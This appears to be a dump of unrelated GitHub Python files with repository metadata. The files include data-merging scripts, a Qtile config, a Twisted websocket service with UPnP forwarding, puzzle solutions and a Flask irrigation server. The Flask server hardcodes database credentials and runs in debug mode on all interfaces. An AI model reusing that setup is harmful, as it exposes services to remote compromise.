mean\n\ndf_M1 = pd.read_json(\"features_M1_M2.json\")\ndf_M2 = pd.read_json(\"/Users/youpele/Documents/WZL/final/features_M2_M3.json\")\ndf_M3 = pd.read_json(\"/Users/youpele/Documents/WZL/final/features_M3_M4.json\")\ndf_M4 = pd.read_json(\"/Users/youpele/Documents/WZL/final/features_M4_M5.json\")\ndf_M5 = pd.read_json(\"/Users/youpele/Documents/WZL/final/features_M5_M6.json\")\ndf_M6 = pd.read_json(\"/Users/youpele/Documents/WZL/final/features_M6_M7.json\")\ndf_M7 = pd.read_json(\"/Users/youpele/Documents/WZL/final/features_M7_M8.json\")\ndf_M8 = pd.read_json(\"/Users/youpele/Documents/WZL/final/features_M8_M9.json\")\ndf_M9 = pd.read_json(\"/Users/youpele/Documents/WZL/final/features_M9_M10.json\")\ndf_M10b = pd.read_json(\"/Users/youpele/Documents/WZL/final/features_M10_5_M11.json\")\ndf_M10a = pd.read_json(\"/Users/youpele/Documents/WZL/final/features_M10_M10_5.json\")\n\n\n#df = [df_M1, df_M2, df_M3, df_M4, df_M5, df_M6, df_M7, df_M8, df_M9, df_M10a, df_M10b]\ndf_merged = pd.concat([df_M1, df_M2, df_M3, df_M4, df_M5, df_M6, df_M7, df_M8, df_M9, df_M10a, df_M10b], \n ignore_index=True)\n\n\ndf_merged_Stempel = df_merged.loc[:, ['max_Stempel_1','min_Stempel_1', 'mean_Stempel_1', \n 'max_Stempel_2','min_Stempel_2', 'mean_Stempel_2',\n 'max_Stempel_3','min_Stempel_3', 'mean_Stempel_3', \n 'max_Stempel_4','min_Stempel_4', 'mean_Stempel_4']]\n\n\nway_to_punch = pd.read_json(\"/Users/youpele/Documents/WZL/final/way_to_punch.json\")\n\n\nthickness_wzl_df = pd.read_json(\"/Users/youpele/Documents/WZL/final/thickness_wzl.json\")\nthickness_wzl_num_thick = thickness_wzl_df.loc[:, ['Number','thickness']]\n\n\nthickness_ibf_df = pd.read_json(\"/Users/youpele/Documents/WZL/final/thickness_ibf.json\")\nthickness_ibf_force = thickness_ibf_df.loc[:, ['entryCoiler_force', 'exitCoiler_force', 'thickness']]\n\n\n\n\n\ndata_digital_coil1 = pd.merge(left = way_to_punch, right = thickness_ibf_force,\n left_index = True, right_index = True)\n\ndata_digital_coil2 = pd.merge(left = data_digital_coil1, right = thickness_wzl_num_thick,\n left_index = True, right_index = True)\n\n\ndata_digital_coil3 = pd.merge(left = data_digital_coil2, right = df_merged_Stempel,\n left_index = True, right_index = True)\n\ndata_digital_coil = data_digital_coil3\n\n\ndata_digital_coil_export = data_digital_coil.to_json(r'/Users/youpele/Documents/WZL/final/080120_task.json')\n\n\ndfffffff= pd.read_json(\"080120_task.json\")\n\n\n\nthickness_ibdway= thickness_ibf_df.loc[:, ['way']]\nthickforce = thickness_ibf_df.loc[:, ['exitCoiler_force']]\n\nplt.plot(thickness_ibdway, thickforce)\n\n\n\n\nrow = len(thickness_ibf_df)\n\n\nls = []\nfor s in range(0,2693):\n ls.append(int(row/2693))\n \nfor s in ls:\n df_temp = thickness_ibf_df.iloc[s:int(s+ls[1])]\n \n\n\nmean([1,2,3])\n\n\n\n\ndef df_split (df, d = 4): \n \n '''\n Takes in dataframe and a depth and split the dataframe according to the depth number inputted\n\n '''\n \n row = len(df)\n\n list_dfs = []\n \n ls = []\n for s in range(0,d):\n ls.append(int(s/d*row))\n\n for s in ls:\n df_temp = df.iloc[s:int(s+ls[1])]\n #arr = np.array(df_temp)\n #df_temp = pd.DataFrame(data=arr.flatten())\n list_dfs.append(df_temp)\n \n return list_dfs\n\n\n\n\navg_entry_force = []\navg_exit_force = []\navg_thickness = []\n\n\nthicknesss_ibf = df_split(thickness_ibf_df,2693)\n\n\navg_exit_force.append(mean(thicknesss_ibf[i]['exitCoiler_force']))\n\n\n'entryCoiler_force', 'exitCoiler_force', 'thickness'\n\nfor i in range(len(thicknesss_ibf)):\n avg_entry_force.append(mean(thicknesss_ibf[i]['entryCoiler_force']))\n avg_exit_force.append(mean(thicknesss_ibf[i]['exitCoiler_force']))\n avg_thickness.append(mean(thicknesss_ibf[i]['thickness']))\n \n\nthickness_avg_ibf = pd.DataFrame({\"avg_entry_force\":avg_entry_force,\n \"avg_exit_force\": avg_exit_force,\n \"avg_thickness\": avg_thickness})\n\n\n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"youpele52/WZL","sub_path":"080120 task.py","file_name":"080120 task.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38936016951","text":"import os\nimport re\nfrom setuptools import setup\n# parse version from package/module without importing or evaluating the code\n\nwith open('packer/__init__.py') as fh:\n for line in fh:\n m = re.search(r\"^__version__ = '(?P[^']+)'$\", line)\n if m:\n version = m.group('version')\n break\n\nsetup(\n name = 'python-vagrant',\n version = version,\n license = 'MIT',\n description = 'Python bindings for creating Packer virtual machine images.',\n long_description = open(os.path.join(os.path.dirname(__file__),\n 'README.md')).read(),\n keywords = 'python virtual machine image box packer virtualbox',\n url = 'https://github.com/kobe6661/python-packer',\n author = 'Konstantin Benz',\n author_email = 'konstantin.benz@gmail.com',\n classifiers = ['License :: OSI Approved :: MIT License',\n 'Development Status :: 4 - Beta',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n ],\n packages = ['packer'],\n)","repo_name":"kobe6661/python-packer","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1767541637","text":"f = open(\"validate_filtering.txt\")\n# wf = open(\"validate_reformat_ldf.txt\", \"w\")\n# of = open(\"validate_reformat_nlf.txt\", \"w\")\n\nfor line in f:\n line_item = line.split(' ')\n if line_item[0] == 'LDF,':\n ldf_string = line_item[1] \n ldf_string = ldf_string[:-1]\n wf.write(f'{ldf_string}\\n')\n elif line_item[0] == 'NLF,':\n string = line_item[1] \n string = string[:-1]\n # of.write(f'{string}\\n')\n\n# wf.close()\n# of.close()\n\n\n \n","repo_name":"chang2000/openGraphMatching","sub_path":"examples/result_analysis/extract_validate.py","file_name":"extract_validate.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"34041126082","text":"import streamlit as st\n\nfrom src.database import select_db, download_db\n\n\nwith st.spinner(\"Analisando dados.gov.br...\"):\n data = select_db()\n# First selected option\ndata[None] = None\n# Index from None\nstart = list(data.keys()).index(None)\n\nst.title(\"Selecione o banco que deseja baixar\")\noption = st.selectbox(\".\", data.keys(), index=start, label_visibility=\"collapsed\")\n\nif option is not None:\n # Download selected database\n with st.spinner(f\"Baixando {option}...\"):\n st.session_state.option = option\n st.session_state.db = download_db(data[option])\n st.success(f\"Banco de dados armazenado com sucesso\")\n st.balloons()\n","repo_name":"pinheiro-lucas/fluxo-de-carros-df","sub_path":"pages/1_💾_Banco_de_Dados.py","file_name":"1_💾_Banco_de_Dados.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13027230749","text":"import webbrowser\nfrom libqtile import bar, widget, hook, qtile\nfrom libqtile.config import Screen\nfrom widgets import NordVPN\nfrom theme import gruvbox_dark\n\nwidget_defaults = dict(\n font=\"Hack\",\n fontsize=30,\n padding=3,\n)\n\nextension_defaults = widget_defaults.copy()\nreconfigure_screens = True\n\ndefault_screen_widgets = lambda: [\n widget.GroupBox(),\n widget.WindowName(),\n widget.Clock(),\n]\n\ndefault_screen_left_widgets = lambda: [\n widget.CurrentLayoutIcon(),\n widget.Spacer(length=10),\n widget.Sep(),\n widget.Spacer(length=10),\n widget.GroupBox(\n borderwidth=1,\n disable_drag=True,\n font=\"Hack\",\n highlight_method=\"text\",\n active=gruvbox_dark[\"foreground\"],\n this_current_screen_border=gruvbox_dark[\"yellow\"],\n ),\n widget.Spacer(length=10),\n widget.Spacer(length=bar.STRETCH),\n]\n\ndefault_screen_right_widgets = lambda: [\n widget.WidgetBox(\n widgets=[\n widget.Spacer(length=20),\n widget.WidgetBox(\n widgets=[\n widget.CPU(fmt=\"{}\"),\n widget.Memory(fmt=\" {} \"),\n widget.ThermalSensor(fmt=\" {} \", font=\"Hack Nerd Font\"),\n NordVPN(),\n ],\n ),\n widget.Spacer(length=10),\n widget.Sep(),\n widget.Volume(fmt=\" 墳 {}\", font=\"Hack Nerd Font\"),\n widget.Spacer(\n length=10,\n ),\n widget.Sep(),\n widget.Spacer(length=10),\n widget.OpenWeather(\n fmt=\" {} \",\n font=\"Hack Nerd Font\",\n location=\"Florianopolis\",\n format=\"fln: {main_temp} °{units_temperature}\",\n mouse_callbacks={\n \"Button1\": lambda: webbrowser.open_new_tab(\n \"https://wttr.in/florianopolis\"\n )\n },\n ),\n widget.WidgetBox(\n widgets=[\n widget.OpenWeather(\n font=\"Hack Nerd Font\",\n location=\"Amsterdam\",\n format=\"ams: {main_temp} °{units_temperature}\",\n mouse_callbacks={\n \"Button1\": lambda: webbrowser.open_new_tab(\n \"https://wttr.in/amsterdam\"\n )\n },\n ),\n ]\n ),\n widget.Spacer(length=10),\n widget.Sep(),\n widget.Spacer(length=10),\n widget.Maildir(\n fmt=\"﫮 {}\",\n font=\"Hack Nerd Font\",\n maildir_path=\"~/mail/personal\",\n sub_folders=(\n {\"label\": \"i\", \"path\": \"inbox\"},\n {\"label\": \"a\", \"path\": \"archives\"},\n ),\n mouse_callbacks={\n \"Button1\": lambda: webbrowser.open_new_tab(\"https://gmail.com\")\n },\n ),\n widget.Spacer(length=10),\n widget.Sep(),\n widget.Spacer(length=10),\n widget.KeyboardLayout(\n configured_keyboards=(\"us\", \"br\"),\n fmt=\" {}\",\n font=\"Hack Nerd Font\",\n ),\n widget.Spacer(length=10),\n widget.Sep(),\n widget.Battery(\n format=\" {char} {percent:2.0%} {hour:d}:{min:02d}/{watt:.2f}W\",\n charge_char=\"\",\n discharge_char=\"\",\n font=\"Hack Nerd Font\",\n empty_char=\"\",\n full_char=\"\",\n notify_bellow=20,\n show_short_text=False,\n ),\n widget.Spacer(length=10),\n widget.Sep(),\n widget.Spacer(length=10),\n widget.Clock(\n format=\"%H:%M:%S\",\n fmt=\" {} \",\n font=\"Hack Nerd Font\",\n mouse_callbacks={\n \"Button1\": lambda: webbrowser.open_new_tab(\n \"https://calendar.google.com/calendar/u/0/r\"\n )\n },\n ),\n widget.Clock(\n format=\"%h %d %Y\",\n fmt=\" {}\",\n font=\"Hack Nerd Font\",\n mouse_callbacks={\n \"Button1\": lambda: webbrowser.open_new_tab(\n \"https://calendar.google.com/calendar/u/0/r\"\n )\n },\n ),\n widget.Spacer(length=10),\n widget.Sep(),\n widget.Spacer(length=10),\n ]\n )\n]\n\nscreens = [\n Screen(\n top=bar.Bar(\n default_screen_left_widgets()\n + [widget.Spacer(length=bar.STRETCH)]\n + default_screen_right_widgets()\n + [widget.Systray(icon_size=40)],\n size=60,\n margin=8,\n background=gruvbox_dark[\"background\"],\n border_width=[0, 0, 0, 0],\n )\n ),\n Screen(\n top=bar.Bar(\n default_screen_left_widgets()\n + [widget.Spacer(length=bar.STRETCH)]\n + default_screen_right_widgets(),\n size=60,\n margin=8,\n background=gruvbox_dark[\"background\"],\n border_width=[0, 0, 0, 0],\n )\n ),\n Screen(\n top=bar.Bar(\n default_screen_left_widgets()\n + [widget.Spacer(length=bar.STRETCH)]\n + default_screen_right_widgets(),\n size=60,\n margin=8,\n background=gruvbox_dark[\"background\"],\n border_width=[0, 0, 0, 0], # Draw top and bottom borders\n ),\n ),\n]\n\n\n@hook.subscribe.screen_change\ndef on_screens_reconfigured(_):\n qtile.cmd_reload_config()\n","repo_name":"benmezger/dotfiles","sub_path":"dot_config/qtile/screens.py","file_name":"screens.py","file_ext":"py","file_size_in_byte":5858,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"72"} +{"seq_id":"4597351787","text":"from autobahn.twisted.websocket import WebSocketServerProtocol, WebSocketServerFactory\nfrom twisted.internet import reactor\n\ntry:\n import upnpy\nexcept ModuleNotFoundError:\n upnpy = None\n\nimport os\nimport simplejson\nimport socket\nimport txaio\n\n\nclass BroadcastServerFactory(WebSocketServerFactory):\n def __init__(self):\n WebSocketServerFactory.__init__(self)\n self.clients = []\n\n def register(self, client):\n if client not in self.clients:\n self.clients.append(client)\n\n def unregister(self, client):\n if client in self.clients:\n self.clients.remove(client)\n\n def publish(self, channel, message, *args, **kwargs):\n payload = simplejson.dumps([\n channel,\n message\n ]).encode('utf-8')\n\n preparedMsg = self.prepareMessage(payload)\n for c in self.clients:\n c.sendPreparedMessage(preparedMsg)\n\n\ndef make_protocol(service):\n class StandaloneServiceProtocol(WebSocketServerProtocol):\n\n def onOpen(self):\n self.factory.register(self)\n service.log.info(\n 'Client {peer} connected (total={total})',\n peer=self.peer,\n total=len(self.factory.clients)\n )\n service.publishManifest()\n service._publishRaceState()\n if service.analyser:\n service.analyser.publish_all()\n\n def connectionLost(self, reason):\n WebSocketServerProtocol.connectionLost(self, reason)\n self.factory.unregister(self)\n service.log.info(\n 'Client {peer} disconnected (remaining={remaining})',\n peer=self.peer,\n remaining=len(self.factory.clients)\n )\n\n return StandaloneServiceProtocol\n\n\nclass StandaloneSession(object):\n def __init__(self, service, port_callback=None, use_upnp=False):\n self._protocol = make_protocol(service)\n self._port_callback = port_callback\n self.service = service\n self.use_upnp = use_upnp\n\n def run(self):\n factory = BroadcastServerFactory()\n factory.protocol = self._protocol\n self.service.set_publish(factory.publish)\n\n port = int(os.environ.get('LIVETIMING_STANDALONE_PORT', 0))\n\n listening_port = reactor.listenTCP(port, factory)\n actual_port = listening_port.getHost().port\n\n upnp_forwarded_port, upnp = None, None\n\n if self._port_callback:\n self._port_callback(actual_port)\n\n should_use_upnp = self.use_upnp or os.environ.get('LIVETIMING_USE_UPNP', False)\n\n if should_use_upnp and upnpy:\n try:\n upnp_forwarded_port, uservice = self.upnp_forward_port(actual_port)\n except Exception:\n self.service.log.failure(\n 'UPnP forwarding failed! Manually forward port {port} on'\n ' your router to make the data externally accessible.',\n port=actual_port\n )\n elif should_use_upnp:\n self.service.log.warn(\n 'UPnP port forwarding requested but upnpy is not'\n ' available. Please manually configure port forwarding.'\n )\n\n txaio.start_logging()\n reactor.run()\n\n if upnp_forwarded_port and uservice:\n uservice.DeletePortMapping(\n NewRemoteHost='',\n NewProtocol='TCP',\n NewExternalPort=upnp_forwarded_port\n )\n self.service.log.info('Removed UPnP port forward for port {port}', port=upnp_forwarded_port)\n\n def upnp_forward_port(self, port):\n u = upnpy.UPnP()\n devices = u.discover()\n\n if len(devices) > 0:\n igd = u.get_igd()\n\n for uservice in igd.get_services():\n if uservice.type_ == 'WANIPConnection':\n ext_ip = uservice.GetExternalIPAddress()['NewExternalIPAddress']\n int_ip = get_local_ip()\n external_port, needs_creating = find_nearest_free_port(port, uservice, int_ip)\n\n if needs_creating:\n uservice.AddPortMapping(\n NewRemoteHost='',\n NewExternalPort=external_port,\n NewProtocol='TCP',\n NewInternalPort=port,\n NewInternalClient=int_ip,\n NewEnabled=1,\n NewPortMappingDescription='Timing71 standalone service port forward',\n NewLeaseDuration=0\n )\n else:\n self.service.log.info('Reusing exising UPnP port forwarding')\n\n self.service.log.info(\n '*** This service is accessible at {host} port {port} ***',\n host=ext_ip,\n port=external_port\n )\n\n return external_port, uservice\n raise Exception('Unable to find a UPnP service to configure port forwarding')\n\n else:\n self.service.log.warn('UPnP forwarding requested but no UPnP router found!')\n\n\ndef find_nearest_free_port(port, uservice, int_ip):\n eport = port\n needs_creating = True\n\n r = get_tcp_mapping_for_port(eport, uservice)\n while r is not None and eport < 65536:\n if r['NewInternalClient'] == int_ip:\n # We've discovered a stale UPnP forward from a previous incarnation\n # Let's reuse it\n needs_creating = False\n break\n eport = eport + 1\n r = get_tcp_mapping_for_port(eport, uservice)\n return eport, needs_creating\n\n\ndef get_tcp_mapping_for_port(port, uservice):\n try:\n return uservice.GetSpecificPortMappingEntry(\n NewProtocol='TCP',\n NewRemoteHost='',\n NewExternalPort=port\n )\n except Exception:\n return None\n\n\ndef get_local_ip():\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((\"8.8.8.8\", 80))\n my_ip = s.getsockname()[0]\n s.close()\n return my_ip\n","repo_name":"timing71/livetiming-core","sub_path":"src/livetiming/service/standalone.py","file_name":"standalone.py","file_ext":"py","file_size_in_byte":6264,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"32159818174","text":"from collections import deque\r\n\r\nn, m = map(int,input().split())\r\n\r\ngraph = []\r\nfor i in range(n):\r\n graph.append(list(map(int,input().split())))\r\ndx = (0,0,-1,1,1,1,-1,-1)\r\ndy = (1,-1,0,0,-1,1,1,-1)\r\ncnt = 0\r\n\r\ndef bfs(i,j):\r\n q = deque()\r\n graph[i][j] = 0\r\n q.append((i,j))\r\n while q:\r\n x, y = q.popleft()\r\n for i in range(8):\r\n nx = dx[i] + x\r\n ny = dy[i] + y\r\n if 0 <= nx < n and 0 <= ny < m:\r\n if graph[nx][ny] == 1:\r\n graph[nx][ny] = 0\r\n q.append((nx,ny))\r\nfor i in range(n):\r\n for j in range(m):\r\n if graph[i][j] == 1:\r\n bfs(i,j)\r\n cnt += 1\r\n \r\nprint(cnt)","repo_name":"wnsgml7267/cote-practice","sub_path":"백준/Silver/14716. 현수막/현수막.py","file_name":"현수막.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18759373359","text":"# Projeto de Agente Inteligente\n# Objetivo: Agente deve coletar items no cenário\n# Autor: Danilo\n\n# Código baseado em: \n# The Nature of Code\n# Daniel Shiffman\n# http://natureofcode.com\n\n# Implements Craig Reynold's autonomous steering behaviors\n# One vehicle \"seeks\"\n# See: http://www.red3d.com/cwr/\n\nfrom Agente import Agente\nfrom Item import Item\n\n#################################################\n# Este código representa o ambiente onde o agente\n# deve atuar.\n#\n# Configuração inicial do ambiente:\n# 1 Agente\n# 1 Item \n#################################################\ndef setup():\n global agente\n global item \n \n # tamanho da tela\n size(800, 400)\n \n # criando agente na tela (triângulo)\n agente = Agente(width / 2, height / 2)\n \n # Criando objeto item. \n # Um item inicial é criado de forma automática. \n item = Item()\n \n\n#################################################\n# Loop de execução do ambiente\n#################################################\ndef draw():\n background(255)\n \n # Adiciona o item no ambiente atual.\n #item.posicionar(item.item_atual)\n item.posicionar()\n \n # O agente deve procurar pelo item na tela.\n agente.procurar(item.item_atual)\n\n # Verificando se o agente atingiu seu objetivo.\n # Se o obetivo for atingido, o sistema deve\n # criar um novo item no ambiente.\n if agente.encontrou(item.item_atual):\n item.item_atual = item.criar_novo()\n agente.itens_encontrados += 1\n print(\"Total de itens encontrados:\", agente.itens_encontrados)\n \n # Atualizando o agente no ambiente.\n agente.update()\n agente.display()\n \n \ndef adicionar(item):\n # Configurando o item\n fill(127)\n stroke(200)\n strokeWeight(2)\n \n # Desenhando o item como elipse\n circle(item.x, item.y, item.z)\n","repo_name":"ryganon/projetos_IAI","sub_path":"Agente_Inteligente_Coletor/Agente_Inteligente_Coletor.pyde","file_name":"Agente_Inteligente_Coletor.pyde","file_ext":"pyde","file_size_in_byte":1868,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20750373986","text":"import sys\nsys.setrecursionlimit(15000)\nfrom collections import deque\n\ndef search():\n queue = deque()\n queue.append(graph[0])\n visited[0] = True\n \n while queue:\n x = queue.popleft()\n for i in range(len(graph)):\n if graph[i] != x and abs(x[0]-graph[i][0])+abs(x[1]-graph[i][1]) <= 1000 and visited[i] == False:\n queue.append(graph[i])\n visited[i] = True\n \nt = int(input())\nans = []\nfor _ in range(t):\n n = int(input())\n graph = []\n visited = [0] * (n+2)\n \n for _ in range(n+2):\n graph.append(list(map(int, input().split())))\n \n search()\n \n if visited[n+1] == True:\n ans.append('happy')\n else:\n ans.append('sad')\n \nfor i in ans:\n print(i)","repo_name":"jongbin26/coding_test","sub_path":"python/9205.py","file_name":"9205.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18138873569","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport argparse, sys, time, os, json, datetime, string, random, traceback\nfrom flask import Flask, render_template, request, session, redirect, abort, send_file, make_response\nfrom flask_cors import CORS\n\nimport DAO\n\nclass Config(object):\n\tSECRET_KEY = ''\n\talphabet = string.ascii_letters + string.digits + string.punctuation\n\tfor i in range(32):\n\t\tSECRET_KEY += ''.join(random.choice(alphabet))\n\tSESSION_PERMANENT = False\n\napp = Flask(__name__)\nCORS(app)\napp.config.from_object(Config())\n\ndao = DAO.DAO(\"db\", 3306, \"IRRIGATRON\", \"IRRIGATRON\", \"IRRIGATRON\", debug=True)\n#dao = DAO.DAO(\"127.0.0.1\", 3306, \"IRRIGATRON\", \"IRRIGATRON\", \"IRRIGATRON\", debug=True)\ndao.init()\n\nmust_water = {}\n\n### HOME ###\n@app.route('/test', methods=['GET'])\ndef test():\n\tresponse = {'message': 'OK'}\n\treturn make_response(json.dumps(response), 200)\n\n### HOME ###\n@app.route('/', methods=['GET'])\n@app.route('/home', methods=['GET'])\ndef home():\n\tplants = dao.getPlants()\n\treturn render_template('home.html', plants=plants)\n\n@app.route('/new_plant', methods=['POST'])\ndef newPlant():\n\tdata = request.form\n\tprint(data)\n\tplant = DAO.PlantDTO(data[\"name\"], data[\"description\"], data[\"pump\"], data[\"tank_height\"])\n\t\n\tif(len(dao.getPlants()) >= 8):\n\t\tprint(\"cannot create a new plant\")\n\telse:\n\t\tdao.updatePlant(plant)\n\n\treturn redirect('/home')\n\n@app.route('/plant/', methods=['GET'])\ndef homePlant(plant_name):\n\tplant = dao.getPlantByName(plant_name)\n\tplants = dao.getPlants()\n\t\n\tinner_keys = dao.getInnerKeys()\n\tprint(inner_keys)\n\n\tplant_data = dao.getDatasByPlant(plant)\n\n\tgroups = {}\n\tfor group in dao.getConditionsByPlant(plant):\n\t\tif str(group.group) not in groups.keys():\n\t\t\tgroups[str(group.group)] = []\n\n\t\tgroups[str(group.group)].append(group)\n\n\tprint(groups.keys())\n\n\tcondition_groups = []\n\n\tfor condition in groups.keys():\n\t\tcondition_groups.append({\"id\":condition, \"conditions\":groups[condition]})\n\n\tinner_keys.append(\"time\")\t##añado el time como inner key\n\n\tlast_tank_height = dao.getLastDatasByPlant(plant, \"tank_height\")\n\tprint(last_tank_height)\n\tif len(last_tank_height) == 0:\n\t\tlast_tank_height = 0\n\telse:\n\t\tlast_tank_height = float(last_tank_height[0].value)\n\n\twater_history = []\n\tfor watering in dao.getWateringsByPlant(plant):\n\t\twater_history.append(watering.timestamp)\n\t\t\n\tprint(water_history)\n\n\treturn render_template('plant.html', plant=plant, plants=plants, water_history=water_history, inner_keys=inner_keys, plant_data=plant_data, condition_groups=condition_groups, tank_height=last_tank_height)\n\n@app.route('/plant//force_water', methods=['POST'])\ndef forceWater(plant_name):\n\tmust_water[plant_name] = True\n\tprint(must_water[plant_name])\n\n\treturn redirect('/plant/{}'.format(plant_name))\n\n@app.route('/plant//update_keys', methods=['POST'])\ndef updateKeys(plant_name):\n\tplant = dao.getPlantByName(plant_name)\n\tplants = dao.getPlants()\n\n\tdata = request.form\n\tprint(data)\n\n\tinner_keys = []\n\tfor e in data.keys():\n\t\tinner_keys.append(e)\n\tplant.inner_keys = ','.join(inner_keys)\n\tdao.updatePlant(plant)\n\n\treturn redirect('/plant/{}'.format(plant_name))\n\n\n@app.route('/plant//new_condition', methods=['POST'])\ndef newCondition(plant_name):\n\tplant = dao.getPlantByName(plant_name)\n\tplants = dao.getPlants()\n\t\n\tdata = request.form\n\tprint(data)\n\n\tcondition = DAO.ConditionDTO(plant, data[\"group_id\"], data[\"key\"], data[\"condition\"], data[\"value\"])\n\n\tdao.updateCondition(condition)\n\n\treturn redirect('/plant/{}'.format(plant_name))\n\n@app.route('/plant//delete_condition', methods=['POST'])\ndef deleteCondition(plant_name):\n\tplant = dao.getPlantByName(plant_name)\n\tplants = dao.getPlants()\n\t\n\tdata = request.form\n\tprint(data)\n\n\tcondition = DAO.ConditionDTO(plant, data[\"group_id\"], data[\"key\"])\n\n\tdao.deleteCondition(condition)\n\n\treturn redirect('/plant/{}'.format(plant_name))\n\n\n## ARDUINO ###\n@app.route('/upload', methods=['POST'])\ndef upload():\n\tdata = request.get_json()\n\n\tprint(data);\n\n\tif \"datas\" in data.keys():\n\t\tfor d in data[\"datas\"]:\n\t\t\tinner_key = list(d.keys())[0]\n\t\t\tinner_value = d[inner_key]\n\t\t\tdata_dto = DAO.DataDTO(timestamp=int(time.time()), key=inner_key, value=inner_value)\n\t\t\tdao.updateData(data_dto)\n\n\t\tresponse = {'message': 'Data OK'}\n\t\treturn make_response(json.dumps(response), 201)\n\telse:\n\t\tresponse = {'message': 'datas is mandatory'}\n\t\treturn make_response(json.dumps(response), 400)\n\n@app.route('/watering', methods=['POST'])\ndef watering():\n\tdata = request.get_json()\n\n\tprint(data);\n\n\tfor key in data.keys():\n\n\t\tif data[key] == '1':\n\t\t\ttry:\n\t\t\t\tplant = dao.getPlantByPump(int(key.replace(\"pump\", \"\")))\n\t\t\t\tif plant != None:\n\t\t\t\t\twatering = DAO.WateringDTO(plant, timestamp=int(time.time()))\n\t\t\t\t\tprint(\"new watering\")\n\t\t\t\t\tdao.createWatering(watering)\n\t\t\texcept:\n\t\t\t\tpass\n\n\tresponse = {'message': 'Data OK'}\n\treturn make_response(json.dumps(response), 201)\n\t\n\n@app.route('/water', methods=['POST'])\ndef water():\n\tdata = request.get_json()\n\n\tprint(data);\n\n\tpump_states = {\"pump0\":False, \"pump1\":False, \"pump2\":False, \"pump3\":False, \"pump4\":False, \"pump5\":False, \"pump6\":False, \"pump7\":False}\n\tfor index,key in enumerate(pump_states.keys()):\n\t\tplant = dao.getPlantByPump(index)\n\t\tif plant != None:\n\t\t\tif plant.name in must_water.keys() and must_water[plant.name] == True:\n\t\t\t\tprint(\"force watering\")\n\t\t\t\tmust_water[plant.name] = False\n\t\t\t\tpump_states[key] = True\n\t\t\t\t\n\t\t\telse:\n\t\t\t\tconditions = dao.getConditionsByPlant(plant)\n\n\t\t\t\tconditions.sort(key=lambda x: x.group)\n\n\t\t\t\tgroups = {}\n\t\t\t\tfor condition in conditions:\n\t\t\t\t\tif str(condition.group) not in groups.keys():\n\t\t\t\t\t\tgroups[str(condition.group)] = []\n\t\t\t\t\tgroups[str(condition.group)].append(condition)\n\n\t\t\t\tfor group_key in groups.keys():\n\t\t\t\t\tcondition_true_counter = 0\n\n\t\t\t\t\tfor condition in groups[group_key]:\n\t\t\t\t\t\tprint(condition.key, condition.value)\n\t\t\t\t\t\tif condition.key != \"time\":\n\t\t\t\t\t\t\tlast_datas = dao.getLastDatasByPlant(plant, condition.key)\n\t\t\t\t\t\t\tif last_datas != None and len(last_datas) > 0:\n\t\t\t\t\t\t\t\tlast_data = last_datas[0].value\n\t\t\t\t\t\t\t\tprint(last_data)\n\t\t\t\t\t\t\t\tif ((condition.condition == \"higher\" and last_data > condition.value)\n\t\t\t\t\t\t\t\t\tor (condition.condition == \"lower\" and last_data < condition.value)):\n\t\t\t\t\t\t\t\t\tcondition_true_counter += 1\n\t\t\t\t\t\t\t\t\tprint(\"esta es true\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tnow = datetime.now().time()\n\t\t\t\t\t\t\ttime_in_condition = str(condition.value).split(\".\")\n\t\t\t\t\t\t\tif len(str(condition.value).split(\".\")) == 1:\n\t\t\t\t\t\t\t\ttime_in_condition.append(0)\n\t\t\t\t\t\t\ttime_in_condition[0] = int(time_in_condition[0])\n\t\t\t\t\t\t\ttime_in_condition[1] = int(time_in_condition[1])\n\n\t\t\t\t\t\t\tif ((condition.condition == \"higher\" and now.hour >= time_in_condition[0] and now.minute > time_in_condition[1])\n\t\t\t\t\t\t\t\tor (condition.condition == \"lower\" and now.hour <= time_in_condition[0] and now.minute < time_in_condition[1])):\n\t\t\t\t\t\t\t\tcondition_true_counter += 1\n\n\t\t\t\t\tprint(condition_true_counter)\n\t\t\t\t\tif condition_true_counter >= len(groups[group_key]):\n\t\t\t\t\t\tpump_states[key] = True\n\t\n\tprint(json.dumps(pump_states))\n\treturn make_response(json.dumps(pump_states), 200)\n\t\n\n#app.run(host=host, debug=True, port=sqlete_defaults.http_port, ssl_context=(sqlete_defaults.sqlete_framework_path+'/sqlete/certs/cert.pem', sqlete_defaults.sqlete_framework_path+'/sqlete/certs/key.pem'))\napp.run(host=\"0.0.0.0\", debug=True, port=5000)","repo_name":"migue27au/IrrigaTRON","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28603845311","text":"def main():\n cases = int(input())\n\n for case in range(cases):\n position = int(input())\n fibb = [0,1]\n cur = 1\n def goToPosOnFib(pos,current):\n if pos < 3:\n return f'{pos} = {fibb[pos-1]}'\n elif current == pos-1:\n return None\n fibb.append(fibb[current] + fibb[current-1])\n goToPosOnFib(pos,current+1)\n goToPosOnFib(position, cur)\n print(f'{position} = {fibb[position-1]}')\n\nif __name__ == '__main__':\n 